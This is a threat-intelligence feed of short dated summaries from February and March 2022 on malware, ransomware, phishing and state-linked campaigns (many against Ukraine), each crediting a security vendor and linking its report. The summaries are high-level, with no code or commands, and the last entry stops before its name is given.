Intel Source:
ASEC
Intel Name:
Webhards distributing njRAT
Date of Scan:
2022-03-08
Impact:
LOW
Summary:
ASEC researchers have identified njRAT malware being distributed through webhards. A webhard is a file-sharing platform used to distribute malware, mainly by attackers targeting Korean users. The malware was disguised as an adult game uploaded to the webhard.
Source: https://asec.ahnlab.com/en/32450/
2022-03-08
Threat Landscape around Ukraine
MEDIUM
+
Intel Source:
Google
Intel Name:
Threat Landscape around Ukraine
Date of Scan:
2022-03-08
Impact:
MEDIUM
Summary:
The Google Threat Analysis Group (TAG) has observed phishing campaigns and espionage activity from a range of threat actors, including FancyBear (APT28) and Ghostwriter, targeting Ukraine. Activity from Mustang Panda was also noted.
Source: https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/
2022-03-08
PROPHET SPIDER Exploits Citrix ShareFile
MEDIUM
+
Intel Source:
CrowdStrike
Intel Name:
PROPHET SPIDER Exploits Citrix ShareFile
Date of Scan:
2022-03-08
Impact:
MEDIUM
Summary:
The CrowdStrike Intelligence team has investigated an incident in which PROPHET SPIDER targeted Microsoft IIS by exploiting CVE-2021-22941. PROPHET SPIDER, first spotted in May 2017, gains initial access to targeted networks by compromising vulnerable web servers.
Source: https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/
2022-03-07
AvosLocker group new variant targets Linux systems
MEDIUM
+
Intel Source:
Qualys
Intel Name:
AvosLocker group new variant targets Linux systems
Date of Scan:
2022-03-07
Impact:
MEDIUM
Summary:
The AvosLocker ransomware group first appeared in June 2021 targeting Windows machines. Recently, researchers at Qualys have identified that the AvosLocker group is also targeting Linux environments. The AvosLocker ransomware group advertises its latest ransomware variants on its dark web leak site and mentioned that they have added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/
2022-03-07
Global credential harvesting campaign
MEDIUM
+
Intel Source:
Curated Intel
Intel Name:
Global credential harvesting campaign
Date of Scan:
2022-03-07
Impact:
MEDIUM
Summary:
Researchers from Curated Intelligence recently tracked a new global credential harvesting campaign targeting Microsoft accounts through a range of phishing emails masquerading as 'shared document' notifications, which deliver an embedded URL leading to a fake Adobe Document Cloud application login page.
Source: https://www.curatedintel.org/2022/03/curated-intel-threat-report-adobe.html
2022-03-07
Cyber campaign against Indian Government
LOW
+
Intel Source:
Telsy
Intel Name:
Cyber campaign against Indian Government
Date of Scan:
2022-03-07
Impact:
LOW
Summary:
Researchers from Telsy identified a spear phishing campaign targeting the Indian government. The threat actors are using a legitimate portal as C2 with encrypted HTTPS communication. Legitimate sites were used as Cobalt Strike C&C.
Source: https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/
2022-03-07
FormBook targets Oil & Gas companies
MEDIUM
+
Intel Source:
Malwarebytes
Intel Name:
FormBook targets Oil & Gas companies
Date of Scan:
2022-03-07
Impact:
MEDIUM
Summary:
During our random intel gathering we identified a tweet from Malwarebytes Threat Intelligence which states that FormBook continues to target oil and gas companies. It also has potential IoCs. A few hours later, Malwarebytes published a blog with the findings. The campaign was delivered by a targeted email that contained two attachments: one a PDF file and the other an Excel document.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/03/beware-of-malware-offering-warm-greetings-from-saudi-aramco/ https://twitter.com/MBThreatIntel/status/1499435858537107459
2022-03-04
Multi malware campaign on Ukraine
HIGH
+
Intel Source:
Trend Micro
Intel Name:
Multi malware campaign on Ukraine
Date of Scan:
2022-03-04
Impact:
HIGH
Summary:
Trend Micro Research has verified and validated a number of alleged cyber attacks carried out by multiple groups in support of both Russia and Ukraine. Researchers analysed internal data and external reports to provide this information.
Source: https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html
2022-03-03
Russia-Ukraine Conflict Leverages Phishing Themes
MEDIUM
+
Intel Source:
Cofense
Intel Name:
Russia-Ukraine Conflict Leverages Phishing Themes
Date of Scan:
2022-03-03
Impact:
MEDIUM
Summary:
As the Russia-Ukraine conflict on the ground and on the cyber front go hand in hand, the Cofense Phishing Defense Center is monitoring phishing emails related to the conflict and has identified malicious campaigns that use the conflict as a lure to target users and enterprises. However, Cofense does not have any evidence to support attributing the phishing campaigns to the countries directly involved in the war.
Source: https://cofense.com/blog/russia-ukraine-conflict-leverages-phishing-themes
2022-03-03
Domains Linked to Phishing Attacks Targeting Ukraine
MEDIUM
+
Intel Source:
SecureWorks
Intel Name:
Domains Linked to Phishing Attacks Targeting Ukraine
Date of Scan:
2022-03-03
Impact:
MEDIUM
Summary:
Researchers at SecureWorks CTU have investigated a warning published by CERT-UA on 25 Feb 2022 regarding phishing attacks targeting Ukrainian military personnel and government. Researchers attributed this campaign to the MOONSCAPE threat group, whereas CERT-UA attributed it to the UNC1151 APT group linked to the Belarusian government.
Source: https://www.secureworks.com/blog/domains-linked-to-phishing-attacks-targeting-ukraine
2022-03-03
DanaBot attacks Ukrainian MOD
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
DanaBot attacks Ukrainian MOD
Date of Scan:
2022-03-03
Impact:
MEDIUM
Summary:
On 2 Mar 2022, in the midst of the Russia-Ukraine conflict, Zscaler identified a threat actor launching an HTTP-based DDoS attack against the Ukrainian Ministry of Defense's webmail server. The attacker is using DanaBot to launch the DDoS attack and to deliver a second-stage malware payload using the download-and-execute command.
Source: https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense
2022-03-02
TA445 Targets European Governments
HIGH
+
Intel Source:
Proofpoint
Intel Name:
TA445 Targets European Governments
Date of Scan:
2022-03-02
Impact:
HIGH
Summary:
The Proofpoint Threat Research team has identified a likely nation-state sponsored phishing campaign using a possibly compromised Ukrainian armed service member’s email account to target European government personnel with a Lua-based malware dubbed SunSeed.
Source: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
2022-03-02
Emotet Malware Updated TTPs
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Emotet Malware Updated TTPs
Date of Scan:
2022-03-02
Impact:
MEDIUM
Summary:
Cyble researchers came across email phishing campaigns by Emotet malware that were similar to old ones, using spam emails with malicious MS Excel files as the initial attack vector to infect targets. It was also observed that Emotet is rebuilding its botnet with the help of the TrickBot malware.
Source: https://blog.cyble.com/2022/02/26/emotet-malware-back-in-action/
2022-03-02
SoulSearcher Malware
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
SoulSearcher Malware
Date of Scan:
2022-03-02
Impact:
MEDIUM
Summary:
Researchers from Fortinet have analyzed the evolution of the SoulSearcher malware, which has been targeting Windows, collecting sensitive information and executing additional malicious modules.
Source: https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware
2022-03-02
Conti Leaks_Seeder_Queries_010322
HIGH
+
Intel Source:
STR
Intel Name:
Conti Leaks_Seeder_Queries_010322
Date of Scan:
2022-03-02
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-03-02
Conti and Karma attacked Healthcare
MEDIUM
+
Intel Source:
Sophos
Intel Name:
Conti and Karma attacked Healthcare
Date of Scan:
2022-03-02
Impact:
MEDIUM
Summary:
Sophos Labs researchers identified that two ransomware groups, Conti and Karma, exploited the ProxyShell vulnerability to gain access to the network of a healthcare provider in Canada, using very different tactics. The Karma group exfiltrated data but did not encrypt the targeted systems, while Conti entered the network later and encrypted the targeted systems.
Source: https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/
2022-03-02
RU Threat Actors TTPs_Phishing Campaign_Seeder_Queries_010322
HIGH
+
Intel Source:
STR
Intel Name:
RU Threat Actors TTPs_Phishing Campaign_Seeder_Queries_010322
Date of Scan:
2022-03-02
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-03-02
BlackCat Ransomware- Technical Analysis
MEDIUM
+
Intel Source:
AT&T
Intel Name:
BlackCat Ransomware- Technical Analysis
Date of Scan:
2022-03-02
Impact:
MEDIUM
Summary:
AT&T researchers recently analyzed BlackCat ransomware samples, which were quite active in Jan 2022. The key takeaways from their analysis were that the ransomware is coded in Rust and targets multiple platforms, Windows and Linux.
Source: https://cybersecurity.att.com/blogs/labs-research/blackcat-ransomware
2022-03-02
TrickBot upgrades AnchorDNS Backdoor
MEDIUM
+
Intel Source:
Security Intelligence
Intel Name:
TrickBot upgrades AnchorDNS Backdoor
Date of Scan:
2022-03-02
Impact:
MEDIUM
Summary:
Researchers from IBM discovered an updated version of the TrickBot group's AnchorDNS backdoor being used in recent attacks ending with the deployment of Conti ransomware. AnchorDNS is notable for communicating with its command and control (C2) server using the DNS protocol.
Source: https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/
2022-03-02
DDoS botnets and cryptominers exploit Log4Shell
MEDIUM
+
Intel Source:
Barracuda
Intel Name:
DDoS botnets and cryptominers exploit Log4Shell
Date of Scan:
2022-03-02
Impact:
MEDIUM
Summary:
Barracuda researchers have analyzed botnets and cryptominers exploiting Log4Shell vulnerabilities, and the activity has been constant for two months. They noticed that the majority of attacks came from IP addresses in the U.S., with half of those IP addresses associated with AWS, Azure and other data centers.
Source: https://blog.barracuda.com/2022/03/02/threat-spotlight-attacks-on-log4shell-vulnerabilities/
2022-03-02
BABYSHARK Malware
MEDIUM
+
Intel Source:
Huntress
Intel Name:
BABYSHARK Malware
Date of Scan:
2022-03-02
Impact:
MEDIUM
Summary:
Researchers at Huntress have identified APT group activity attributed to North Korean threat actors targeting national security institutes. The North Korean APT is using a malware family called BABYSHARK; this variant of the malware is customized to the specific victim environment.
Source: https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood
2022-03-02
Daxin Backdoor espionage campaign
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Daxin Backdoor espionage campaign
Date of Scan:
2022-03-02
Impact:
MEDIUM
Summary:
Researchers from Symantec found a new, highly sophisticated piece of malware being used by a Chinese threat actor; the backdoor is dubbed Daxin. Most of the targets have been government organizations of interest to China. The malware has also been called the most advanced type ever used by China-linked threat actors.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage
2022-03-02
Vollgar CoinMiner targets MSSQL
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Vollgar CoinMiner targets MSSQL
Date of Scan:
2022-03-02
Impact:
MEDIUM
Summary:
Researchers from ASEC are monitoring a specific CoinMiner that has been consistently distributed to vulnerable MS-SQL servers. ASEC infrastructure has detected Vollgar CoinMiner samples in its logs. Vollgar is a typical CoinMiner that is installed via brute-force attacks against MS-SQL servers with weak account credentials.
Source: https://asec.ahnlab.com/en/32143/
2022-03-02
Magniber Ransomware being Redistributed
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Magniber Ransomware being Redistributed
Date of Scan:
2022-03-02
Impact:
MEDIUM
Summary:
ASEC researchers have identified a redistribution campaign by Magniber ransomware, which disguises itself as Windows update files. The distributed Magniber files carry the normal Windows Installer (MSI) extension. Magniber ransomware is currently distributed using typosquatting techniques targeting Chrome and Edge users on the latest Windows version.
Source: https://asec.ahnlab.com/en/32226/
2022-03-01
Electron Bot - SEO poisoning malware
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
Electron Bot - SEO poisoning malware
Date of Scan:
2022-03-01
Impact:
MEDIUM
Summary:
Researchers at Check Point Research have identified a new malware dubbed Electron Bot, which has infected over 5,000 active machines worldwide and is being distributed through Microsoft's official store. Electron Bot is a modular SEO poisoning malware used for social media promotion and click fraud. Once the malware persists inside the targeted system, it executes attacker commands such as controlling social media accounts on Facebook, Google and SoundCloud.
Source: https://research.checkpoint.com/2022/new-malware-capable-of-controlling-social-media-accounts-infects-5000-machines-and-is-actively-being-distributed-via-gaming-applications-on-microsofts-official-store/
2022-03-01
QakBot Campaign with old Tactics
MEDIUM
+
Intel Source:
Cofense
Intel Name:
QakBot Campaign with old Tactics
Date of Scan:
2022-03-01
Impact:
MEDIUM
Summary:
The Cofense Phishing Defense Center has analysed emails delivering Qakbot that use a familiar tactic seen in old emails.
Source: https://cofense.com/blog/qakbot-campaign-attempts-to-revive-old-emails
2022-03-01
UNC3313 targets MiddleEast government
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
UNC3313 targets MiddleEast government
Date of Scan:
2022-03-01
Impact:
MEDIUM
Summary:
Mandiant researchers recently responded to intrusion activity by UNC3313, who were targeting a Middle East government; new targeted malware, Gramdoor and Starwhale, was also used. The whole process started with a targeted spear phishing email.
Source: https://www.mandiant.com/resources/telegram-malware-iranian-espionage
2022-03-01
New wiper and worm targets Ukraine
HIGH
+
Intel Source:
WeLiveSecurity
Intel Name:
New wiper and worm targets Ukraine
Date of Scan:
2022-03-01
Impact:
HIGH
Summary:
ESET researchers discovered a new set of malware and a worm after Russia's invasion of Ukraine. The malware was dubbed IsaacWiper and HermeticWizard, along with a decoy ransomware called HermeticRansom, aka PartyTicket ransomware.
Source: https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/
2022-03-01
ColdStealer Infostealer
MEDIUM
+
Intel Source:
ASEC
Intel Name:
ColdStealer Infostealer
Date of Scan:
2022-03-01
Impact:
MEDIUM
Summary:
Researchers from ASEC have analysed a new type of infostealer dubbed ColdStealer, which disguises itself as a software download for cracks and tools. There are two distribution methods used by ColdStealer: first, distributing a single type of malware like CryptBot or RedLine; second, dropper-type malware.
Source: https://asec.ahnlab.com/en/32090/
2022-03-01
Spear Phishing attacks on Ukraine
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Spear Phishing attacks on Ukraine
Date of Scan:
2022-03-01
Impact:
MEDIUM
Summary:
Researchers from Palo Alto identified a spear phishing campaign attributed to UAC-0056. The target organizations were from Ukraine, and the payloads included the document stealer OutSteel and the downloader SaintBot.
Source: https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/
2022-02-28
Evolution of EvilCorp
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
Evolution of EvilCorp
Date of Scan:
2022-02-28
Impact:
MEDIUM
Summary:
Researchers from SentinelLabs have assessed with high confidence that WastedLocker, Hades, Phoenix Locker and PayloadBIN belong to the same cluster of malware operated by Evil Corp. A technical analysis was also done on the evolution of Evil Corp from Dridex through to Macaw Locker, and for the first time they publicly describe CryptOne and the role it plays in Evil Corp malware development.
Source: https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp
2022-02-28
SockDetour Targets U.S. Defense Contractors
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
SockDetour Targets U.S. Defense Contractors
Date of Scan:
2022-02-28
Impact:
MEDIUM
Summary:
Researchers from Palo Alto came across a stealthy custom malware, SockDetour, that targeted U.S.-based defense contractors. Analysis shows that SockDetour was delivered from an external FTP server to a U.S.-based defense contractor's internet-facing Windows server.
Source: https://unit42.paloaltonetworks.com/sockdetour/
2022-02-28
MuddyWater_Seeder Queries_25/02/2022
HIGH
+
Intel Source:
STR
Intel Name:
MuddyWater_Seeder Queries_25/02/2022
Date of Scan:
2022-02-28
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-02-28
DDoS attacks against Ukrainian Websites
MEDIUM
+
Intel Source:
netlab360
Intel Name:
DDoS attacks against Ukrainian Websites
Date of Scan:
2022-02-28
Impact:
MEDIUM
Summary:
NetLab360 researchers analyzed the recent DDoS attacks on Ukrainian websites and tracked the botnets involved. According to them, the C2s belong to multiple malware families, including Mirai, Gafgyt, ripprbot, moobot and ircBot.
Source: https://blog-netlab-360-com.translate.goog/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=zh-CN
2022-02-28
TrickBot Switches to New Malware
MEDIUM
+
Intel Source:
Intel471
Intel Name:
TrickBot Switches to New Malware
Date of Scan:
2022-02-28
Impact:
MEDIUM
Summary:
As per the recent report by Intel 471, TrickBot is switching its operations and joining hands with Emotet operators. It has also been noticed that the Bazar malware family was recently linked to TrickBot, as its operators were taking over TrickBot operations.
Source: https://intel471.com/blog/trickbot-2022-emotet-bazar-loader
2022-02-28
UNC2596 deploys Cuba ransomware
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
UNC2596 deploys Cuba ransomware
Date of Scan:
2022-02-28
Impact:
MEDIUM
Summary:
Mandiant researchers have tracked a ransomware gang as UNC2596, which also calls itself COLDDRAW and is commonly known as Cuba ransomware; it has been found exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices. The Cuba operation primarily targets the United States, followed by Canada.
Source: https://www.mandiant.com/resources/unc2596-cuba-ransomware
2022-02-25
Muddywater attacks U.S/Worldwide
HIGH
+
Intel Source:
FBI/NCSC/CISA
Intel Name:
Muddywater attacks U.S/Worldwide
Date of Scan:
2022-02-25
Impact:
HIGH
Summary:
Authorities from the US and UK have released a detailed advisory about the recent cyber espionage campaign of MuddyWater, which is allegedly state-sponsored by Iran and works in the interests of MOIS. In this current campaign they have mainly targeted government and private organizations in industries including telecom, defense and oil & gas, located in Asia, Africa, Europe and North America. This time they have come up with a variety of malware, including PowGoop, Small Sieve, Mori and POWERSTATS.
Source: https://www.ic3.gov/Media/News/2022/220224.pdf
2022-02-24
TeamTNT targeting Linux servers
MEDIUM
+
Intel Source:
Intezer
Intel Name:
TeamTNT targeting Linux servers
Date of Scan:
2022-02-24
Impact:
MEDIUM
Summary:
Researchers at Intezer have shared the TTPs of the TeamTNT threat actor. Over the past year TeamTNT has been very active and is one of the predominant cryptojacking threat actors; it is currently targeting Linux servers.
Source: https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/
2022-02-24
Cyclops Blink malware by Sandworm
MEDIUM
+
Intel Source:
NCSC-UK
Intel Name:
Cyclops Blink malware by Sandworm
Date of Scan:
2022-02-24
Impact:
MEDIUM
Summary:
A joint advisory has been published by the NCSC (UK) and CISA, FBI and NSA (USA) that identifies a new malware used by the actor Sandworm. Sandworm, also known as Voodoo Bear, has previously been attributed to Russia's GRU. The malware, dubbed Cyclops Blink, appears to be a replacement for the VPNFilter malware exposed in 2018, and its deployment could allow Sandworm to remotely access networks. The advisory also includes information on the associated TTPs used by Sandworm.
Source: https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf
2022-02-23
Operation Cache Panda
LOW
+
Intel Source:
CyCraft
Intel Name:
Operation Cache Panda
Date of Scan:
2022-02-23
Impact:
LOW
Summary:
Researchers from CyCraft have come across a campaign targeting Taiwan's financial trading sector via a supply chain attack; the campaign has been attributed to the allegedly state-sponsored threat actor APT10.
Source: https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934
2022-02-22
Katana Botnet exploited Ukrainian websites
MEDIUM
+
Intel Source:
Cado security
Intel Name:
Katana Botnet exploited Ukrainian websites
Date of Scan:
2022-02-22
Impact:
MEDIUM
Summary:
A team from Cado Security has identified the 'Katana botnet' (a Mirai variant) as the source behind the series of DDoS attacks against Ukrainian websites on 15-16 February. The impacted sites included bank, government and military websites. Moreover, Ukrainian CERT, 360Netlab and BadPackets have attributed the source of these attacks to the Mirai botnet.
Source: https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/
2022-02-22
CryptBot Infostealer
MEDIUM
+
Intel Source:
ASEC
Intel Name:
CryptBot Infostealer
Date of Scan:
2022-02-22
Impact:
MEDIUM
Summary:
A new version of the CryptBot info stealer was found by ASEC researchers; it was being distributed via multiple websites that offer free downloads of cracks for games and pro-grade software. In the current version of CryptBot there is only one infostealing C2.
Source: https://asec.ahnlab.com/en/31802/
2022-02-22
Predatory Sparrow targets Iran's BroadCaster
LOW
+
Intel Source:
Checkpoint
Intel Name:
Predatory Sparrow targets Iran's BroadCaster
Date of Scan:
2022-02-22
Impact:
LOW
Summary:
A wave of cyberattacks has flooded Iran in 2021 and early 2022. The CPR team has done a technical analysis of one of the attacks against the Iranian national media corporation Islamic Republic of Iran Broadcasting (IRIB), which occurred in late January 2022.
Source: https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
2022-02-22
Cobalt Strike targets MS-SQL servers
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Cobalt Strike targets MS-SQL servers
Date of Scan:
2022-02-22
Impact:
MEDIUM
Summary:
Researchers from ASEC discovered a campaign in which unpatched Microsoft SQL database servers were targeted for the distribution of Cobalt Strike. The attacker usually scans port 1433 to check whether MS-SQL servers are exposed to the public; if one is found open, they launch brute-force or dictionary attacks against the admin account.
Source: https://asec.ahnlab.com/en/31811/
2022-02-22
Qbot utilized to exploit ZeroLogon Vulnerability
MEDIUM
+
Intel Source:
DFIR Report
Intel Name:
Qbot utilized to exploit ZeroLogon Vulnerability
Date of Scan:
2022-02-22
Impact:
MEDIUM
Summary:
Researchers at The DFIR Report have documented threat actors using Qbot and exploiting the ZeroLogon vulnerability. The threat actor gained initial access through the execution of a malicious DLL.
Source: https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
2022-02-22
Arkei Infostealer utilizing SmokeLoader
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
Arkei Infostealer utilizing SmokeLoader
Date of Scan:
2022-02-22
Impact:
MEDIUM
Summary:
The latest analysis of the Arkei Infostealer shows that the cyber-thieves are increasingly targeting people using multifactor authentication as well as crypto-wallets. Arkei Infostealer is often sold and distributed as Malware-as-a-Service and has been spotted utilizing SmokeLoader as a method of deployment. Both Arkei and SmokeLoader have been identified using the same IOCs and known-malicious URLs to conduct their malicious operations.
Source: https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer?utm_medium=social&utm_source=bambu
2022-02-21
Remcos RAT
MEDIUM
+
Intel Source:
ISC.SANS
Intel Name:
Remcos RAT
Date of Scan:
2022-02-21
Impact:
MEDIUM
Summary:
An ISC SANS researcher has shared an analysis of a sample received via email. The file arrived as an attachment to a mail that pretended to relate to a purchase order. The researcher later attributed the file to Remcos RAT.
Source: https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/
2022-02-21
PseudoManuscrypt Malware
MEDIUM
+
Intel Source:
ASEC
Intel Name:
PseudoManuscrypt Malware
Date of Scan:
2022-02-21
Impact:
MEDIUM
Summary:
Multiple Windows machines in South Korea have been attacked by the PseudoManuscrypt malware. This malware is said to use the same tactics as CryptBot. The malware's targets have mostly been government and industrial organizations.
Source: https://asec.ahnlab.com/en/31683/
2022-02-21
TunnelVision exploiting Log4j
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
TunnelVision exploiting Log4j
Date of Scan:
2022-02-21
Impact:
MEDIUM
Summary:
SentinelOne researchers have observed activity of the TunnelVision attackers, which focuses on exploitation of the VMware Horizon Log4j vulnerabilities. The attackers are actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement. Researchers have been tracking the activity of this Iranian threat actor operating in the Middle East and the US.
Source: https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/
2022-02-18
Gamaredon targets Ukraine
HIGH
+
Intel Source:
Palo Alto
Intel Name:
Gamaredon targets Ukraine
Date of Scan:
2022-02-18
Impact:
HIGH
Summary:
The Russia-linked Gamaredon hacking group, aka Primitive Bear, has been actively targeting a Western government entity in Ukraine. The attack vector was a phishing attack that leveraged a job search and employment platform within the country as a conduit to upload its malware downloader in the form of a resume for an active job listing related to the targeted entity.
Source: https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/ https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/
2022-02-18
Kraken- A new botnet
MEDIUM
+
Intel Source:
ZeroFox
Intel Name:
Kraken- A new botnet
Date of Scan:
2022-02-18
Impact:
MEDIUM
Summary:
Researchers from ZeroFox have found a new Golang-based botnet dubbed Kraken, which is currently under development and has backdoor capabilities to siphon sensitive information from compromised Windows hosts. Its targets are crypto wallets, including but not limited to Armory, Atomic Wallet, Bytecoin, Electrum, Ethereum, Exodus, Guarda, Jaxx Liberty and Zcash.
Source: https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/#iocs
2022-02-18
Moses Staff targets Israeli Organization
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Moses Staff targets Israeli Organization
Date of Scan:
2022-02-18
Impact:
MEDIUM
Summary:
Moses Staff threat actor has recently launched a new espionage campaign against Israeli organizations. This time they have been leveraging the ProxyShell vulnerability in Microsoft Exchange servers as an initial infection vector to deploy two web shells followed by exfiltrating Outlook Data Files (.PST) from the compromised server.
Source: https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard
2022-02-18
Power BI Phishing Campaign
MEDIUM
+
Intel Source:
Cofense
Intel Name:
Power BI Phishing Campaign
Date of Scan:
2022-02-18
Impact:
MEDIUM
Summary:
The Cofense Phishing Defense Center has analysed a new phishing campaign that harvests Microsoft credentials by impersonating Power BI emails. Due to Power BI's popularity, widespread use and vendor trust, it has become a prime target for threat actors to spoof and abuse in phishing attacks.
Source: https://cofense.com/blog/phishers-spoof-power-bi-to-visualize-your-credential-data
2022-02-17
ModifiedElephant APT
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
ModifiedElephant APT
Date of Scan:
2022-02-17
Impact:
MEDIUM
Summary:
SentinelOne researchers attributed the intrusions to a group tracked as 'ModifiedElephant'. The threat actor has been operational since at least 2012, and its activity aligns sharply with Indian state interests. The threat actor uses spear-phishing with malicious documents to deliver malware such as NetWire, DarkComet and keyloggers.
Source: https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/
2022-02-17
GlowSpark Campaign
MEDIUM
+
Intel Source:
Inquest
Intel Name:
GlowSpark Campaign
Date of Scan:
2022-02-17
Impact:
MEDIUM
Summary:
InQuest Labs researchers analysed a malicious document from the GlowSpark campaign, which is a possible attack vector in the WhisperGate attack. Some samples from this campaign are quite stealthy and successfully infect the target. This allows the threat actor to gain a strong foothold in the victim's network without leaving a large footprint.
Source: https://inquest.net/blog/2022/02/10/380-glowspark
2022-02-17
BlackByte TTP_Seeder Queries_16/02/2022
HIGH
+
Intel Source:
STR
Intel Name:
BlackByte TTP_Seeder Queries_16/02/2022
Date of Scan:
2022-02-17
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-02-17
Emotet new Infection Method
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Emotet new Infection Method
Date of Scan:
2022-02-17
Impact:
MEDIUM
Summary:
Researchers at Palo Alto Unit 42 have found that, yet again, the infamous Emotet malware has switched tactics. It now propagates through socially engineered emails carrying malicious Excel files that include an obfuscated Excel 4.0 macro. When the macro is activated it downloads and executes an HTML application, which downloads two stages of PowerShell to retrieve and execute the final Emotet payload.
Source: https://unit42.paloaltonetworks.com/new-emotet-infection-method/
2022-02-16
BitRAT malware
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
BitRAT malware
Date of Scan:
2022-02-16
Impact:
MEDIUM
Summary:
Threat actors are leveraging NFT (non-fungible token) information to lure users into downloading the BitRAT malware. The campaign makes use of malicious Excel files named 'NFT_Items' to attract targets. These files are hosted on the Discord app and appear to contain names of NFTs, forecasts of potential investment returns and selling quantities.
Source: https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat
2022-02-16
MyloBot Malware
MEDIUM
+
Intel Source:
Minerva Labs
Intel Name:
MyloBot Malware
Date of Scan:
2022-02-16
Impact:
MEDIUM
Summary:
A new version of the MyloBot malware has been observed deploying malicious payloads that are used to send sextortion emails demanding a huge sum from victims in the form of digital currency. MyloBot also leverages a technique called process hollowing, wherein the attack code is injected into a suspended and hollowed process in order to circumvent process-based defenses.
Source: https://blog.minerva-labs.com/mylobot-2022-so-many-evasive-techniques-just-to-send-extortion-emails
2022-02-16
TA2541 APT targets Aviation
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
TA2541 APT targets Aviation
Date of Scan:
2022-02-16
Impact:
MEDIUM
Summary:
Proofpoint researchers have identified the threat actor TA2541 as targeting the aviation and aerospace industries. The threat actor commonly uses RATs through which it can control compromised machines. The targets are said to number in the hundreds of organizations across North America, Europe and the Middle East.
Source: https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight
2022-02-16
Trickbot Attacks Global Giants customers
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
Trickbot Attacks Global Giants customers
Date of Scan:
2022-02-16
Impact:
MEDIUM
Summary:
Researchers from Check Point analyzed a new evasive technique of TrickBot and also found that this time it has been targeting the customers of more than 60 firms worldwide. The TrickBot operators have been using anti-analysis techniques so that researchers can't send automated requests to the command-and-control servers to get fresh web-injects.
Source: https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/
2022-02-16
ShadowPad RAT linked to Chinese government
MEDIUM
+
Intel Source:
SecureWorks
Intel Name:
ShadowPad RAT linked to Chinese government
Date of Scan:
2022-02-16
Impact:
MEDIUM
Summary:
Researchers from SecureWorks were able to link recent ShadowPad malware activity to multiple threat actors from China whose activity can be linked to a Chinese ministry and the PLA. It is the same malware that was behind the attacks on NetSarang, CCleaner and ASUS.
Source: https://www.secureworks.com/research/shadowpad-malware-analysis
2022-02-16
LockBit 2.0 Ransomware TTPs
HIGH
+
Intel Source:
Picus Security
Intel Name:
